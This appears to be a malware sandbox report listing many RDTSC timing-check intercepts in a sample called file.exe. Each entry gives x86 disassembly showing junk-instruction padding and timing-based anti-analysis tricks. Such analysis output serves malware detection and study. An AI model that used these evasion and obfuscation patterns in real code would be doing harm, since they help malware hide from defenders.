                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADDFC second address: AADE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FDF30F40A58h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABD7A second address: AABE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3562h], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FDF30D0E2F8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D2F91h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FDF30D0E2F8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D1965h], edi 0x0000005e mov eax, dword ptr [ebp+122D024Dh] 0x00000064 add bx, 68A1h 0x00000069 push FFFFFFFFh 0x0000006b add di, 86DDh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jnl 00007FDF30D0E2F6h 0x0000007a pop ecx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE09 second address: AABE1D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30F40A58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE1D second address: AABE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE22 second address: AABE27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE04E second address: AAE056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0DFF second address: AB0E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDF30F40A60h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0E33 second address: AB0E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF71 second address: AAFF92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDF30F40A65h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF92 second address: AAFF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E48 second address: AB2ED7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30F40A6Eh 0x00000008 jmp 00007FDF30F40A68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FDF30F40A58h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c call 00007FDF30F40A66h 0x00000031 or dword ptr [ebp+122D1C5Ah], esi 0x00000037 pop edi 0x00000038 sub dword ptr [ebp+1244C820h], eax 0x0000003e push 00000000h 0x00000040 mov edi, 6F8D8D34h 0x00000045 add edi, 01F9E321h 0x0000004b push 00000000h 0x0000004d movzx ebx, si 0x00000050 xchg eax, esi 0x00000051 push edi 0x00000052 pushad 0x00000053 push esi 0x00000054 pop esi 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 pop edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d jo 00007FDF30F40A56h 0x00000063 pop ecx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1068 second address: AB10F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D28A4h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FDF30D0E2F8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FDF30D0E2F8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 mov dword ptr [ebp+122D233Bh], ebx 0x00000057 pop edi 0x00000058 sub dword ptr [ebp+1244C4F6h], ebx 0x0000005e mov bh, 2Bh 0x00000060 mov eax, dword ptr [ebp+122D0905h] 0x00000066 push ebx 0x00000067 mov ebx, dword ptr [ebp+122D1C7Ch] 0x0000006d pop ebx 0x0000006e push FFFFFFFFh 0x00000070 or dword ptr [ebp+122D17F1h], eax 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push edi 0x0000007a jo 00007FDF30D0E2F6h 0x00000080 pop edi 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB20A8 second address: AB20B2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F82 second address: AB4F99 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FDF30D0E2F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FDF30D0E2F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F99 second address: AB4F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F9D second address: AB4FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4FA3 second address: AB500C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDF30F40A58h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e mov ax, 5890h 0x00000012 popad 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FDF30F40A58h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D28F3h], edi 0x00000035 push 00000000h 0x00000037 mov di, 8867h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FDF30F40A5Eh 0x00000042 pushad 0x00000043 jmp 00007FDF30F40A60h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7097 second address: AB70B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDF30D0E2F8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB70B5 second address: AB70BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3124 second address: AB3128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8F95 second address: AB8F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2369 second address: AC2396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnp 00007FDF30D0E2F6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FDF30D0E2F6h 0x0000001b jmp 00007FDF30D0E302h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2396 second address: AC23A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDF30F40A5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23A6 second address: AC23AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23AC second address: AC23B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23B2 second address: AC23B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2690 second address: AC2696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7F73 second address: AC7FAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDF30D0E2FDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jc 00007FDF30D0E300h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007FDF30D0E2FCh 0x00000020 jnc 00007FDF30D0E2F6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FAB second address: AC7FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FB2 second address: AC7FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDF30D0E2FEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FD2 second address: AC7FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8138 second address: AC8177 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jc 00007FDF30D0E2F8h 0x00000013 push edx 0x00000014 jnl 00007FDF30D0E2F6h 0x0000001a pop edx 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 pushad 0x00000022 push esi 0x00000023 pop esi 0x00000024 jmp 00007FDF30D0E300h 0x00000029 popad 0x0000002a pop eax 0x0000002b mov eax, dword ptr [eax] 0x0000002d push ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8177 second address: AC818D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007FDF30F40A60h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4A3 second address: ACC4C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDF30D0E306h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4C0 second address: ACC4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A69h 0x00000009 js 00007FDF30F40A56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4E5 second address: ACC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FDF30D0E329h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FDF30D0E2F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4FA second address: ACC51B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDF30F40A67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC51B second address: ACC51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC6AC second address: ACC6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FDF30F40A68h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC80F second address: ACC81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDF30D0E2F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC81C second address: ACC828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDF30F40A56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCBCE second address: ACCC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E309h 0x00000009 jmp 00007FDF30D0E308h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC0A second address: ACCC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC0E second address: ACCC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FDF30D0E2F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FDF30D0E2FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC2B second address: ACCC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD66 second address: ACCD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD6A second address: ACCD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD6E second address: ACCD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD78 second address: ACCD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD7C second address: ACCD86 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52887 second address: A5289B instructions: 0x00000000 rdtsc 0x00000002 js 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FDF30F40A56h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5289B second address: A528DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDF30D0E307h 0x00000011 pushad 0x00000012 jnp 00007FDF30D0E2F6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDF30D0E2FFh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1967 second address: AD196B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1AAA second address: AD1AB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD20E6 second address: AD20EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD264C second address: AD2659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FDF30D0E2F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC976 second address: ADC97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC97A second address: ADC993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDF30D0E2FFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC993 second address: ADC997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC997 second address: ADC9B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDF30D0E305h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9B5 second address: ADC9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9BB second address: ADC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9C1 second address: ADC9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9CD second address: ADC9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6B7 second address: ADB6C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6C5 second address: ADB6DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDF30D0E300h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB7F3 second address: ADB7FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30F40A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBC78 second address: ADBC82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBDB8 second address: ADBDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC08A second address: ADC095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC095 second address: ADC099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFFD second address: A5B005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B005 second address: A5B00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA81FC second address: AA8201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8201 second address: A87F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FDF30F40A60h 0x00000012 lea eax, dword ptr [ebp+12489FA0h] 0x00000018 mov cx, 6A1Ah 0x0000001c nop 0x0000001d jnc 00007FDF30F40A71h 0x00000023 push eax 0x00000024 jmp 00007FDF30F40A5Ch 0x00000029 nop 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FDF30F40A58h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 or ecx, dword ptr [ebp+122D2B86h] 0x0000004a call dword ptr [ebp+122D1BD2h] 0x00000050 push ecx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA835F second address: AA8384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FDF30D0E2F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8384 second address: AA839E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDF30F40A60h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA839E second address: AA83A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA83A4 second address: AA83A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA894D second address: AA8953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA903C second address: AA9040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
